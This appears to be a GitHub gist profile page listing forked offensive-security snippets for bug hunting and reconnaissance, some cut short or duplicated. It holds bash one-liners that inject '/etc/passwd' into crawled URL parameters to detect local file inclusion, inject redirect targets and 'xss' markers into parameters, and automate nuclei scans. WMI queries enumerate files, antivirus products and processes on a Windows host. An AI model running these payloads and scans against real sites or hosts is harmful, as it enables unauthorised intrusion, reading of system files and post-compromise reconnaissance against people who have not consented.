Skip to content

Instantly share code, notes, and snippets.

View sasqwatch's full-sized avatar
💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
View GitHub Profile
SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')"
SELECT * FROM win32_networkconnection"
Select * from Win32_ComputerSystem"
SELECT * FROM Win32_DeviceGuard"
SELECT * FROM win32_service"
SELECT * FROM AntiVirusProduct"
SELECT * FROM MSFT_DNSClientCache"
SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process"
SELECT * FROM Win32_Process"
SELECT * FROM Win32_Process WHERE SessionID != 0"
@sasqwatch
sasqwatch / is_cloudflare.py
Created August 19, 2020 05:57 — forked from dwisiswant0/is_cloudflare.py
Check if an IP is owned by Cloudflare
#!/bin/env python
# Credits goes to @sw33tLie
from ipaddress import ip_network, ip_address
cidrs = ["173.245.48.0/20","103.21.244.0/22","103.22.200.0/22","103.31.4.0/22","141.101.64.0/18","108.162.192.0/18","190.93.240.0/20","188.114.96.0/20","197.234.240.0/22","198.41.128.0/17","162.158.0.0/15","104.16.0.0/12","172.64.0.0/13","131.0.72.0/22"]
def is_cloudflare(ip):
for cidr in cidrs:
net = ip_network(cidr)
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
@sasqwatch
sasqwatch / nuclear.sh
Created August 18, 2020 04:57 — forked from dwisiswant0/nucleir.sh
Automate nuclei
nucleir() {
local TPL="$HOME/Documents/nuclei-templates"
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
[[ -z "${2}" ]] && { echo "Input target?"; return; }
for i in `ls -1d ${TPL}/*/`; do
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
fi
@sasqwatch
sasqwatch / nuclear.sh
Created August 18, 2020 04:57 — forked from dwisiswant0/nucleir.sh
Automate nuclei
nucleir() {
local TPL="$HOME/Documents/nuclei-templates"
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
[[ -z "${2}" ]] && { echo "Input target?"; return; }
for i in `ls -1d ${TPL}/*/`; do
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
fi
@sasqwatch
sasqwatch / bash_aliases.sh
Created August 18, 2020 04:57 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}

Initial Notes:

  • The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
  • CLRConfig will look for configurations in the following places in the following order:
    • Look at environment variables (prepending COMPlus_ to the name)
    • Look at the framework registry keys (HKCU\Software\Microsoft\.NETFramework
    • Look at the framework registry keys HKLM\Software\Microsoft\.NETFramework)
  • These can be set in the following ways:
    • Setting the environment variable COMPlus_:
  • Windows
@sasqwatch
sasqwatch / oopen.sh
Created August 18, 2020 04:25 — forked from gwen001/oopen.sh
oneliner to open a bunch of hosts/urls
firefox `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
firefox `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | tr "\n" " "`
chromium-browser `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
chromium-browser `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | tr "\n" " "`
function oopen() {
firefox `cat $1 | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
}
@sasqwatch
sasqwatch / oasn.sh
Created August 18, 2020 04:25 — forked from gwen001/oasn.sh
oneliner to retrieve AS Numbers of a company
(ls /tmp/GeoLite2-ASN-CSV.zip||wget --quiet -P /tmp "https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip") 2>&1|grep X; unzip -c /tmp/GeoLite2-ASN-CSV.zip|grep -i airbnb|cut -d ',' -f 2|sort -fu
amass intel -org paypal | cut -d ',' -f 1
output:
133850
137437
206695
206704
@sasqwatch
sasqwatch / otestu.sh
Created August 18, 2020 04:25 — forked from gwen001/otestu.sh
onliner to quickly test some urls using curl
cat plainurls.txt | while read u;do echo "$(printf '%-100s' "$u")-> $((curl -I -s -m 5 -k "$u"||echo KO)|head -n 1 -)"; done
From a json file:
cat waybackurls.json|jq -r '.[]'|grep 'http'|cut -d '"' -f 2 | while read u;do echo "$(printf '%-100s' "$u")-> $((curl -I -s -m 5 -k "$u"||echo KO)|head -n 1 -)"; done
Using parallel to speed up the process:
cat plainurls.txt | parallel -j 20 -I# 'echo "$(printf "%-100s" "#") -> $((curl -I -s -m 5 -k "#"||echo KO)|head -n 1 -)"'
function otestu {
cat $1 | parallel -j 20 -I# 'echo "$(printf "%-100s" "#") -> $((curl -I -s -m 5 -k "#"||echo KO)|head -n 1 -)"'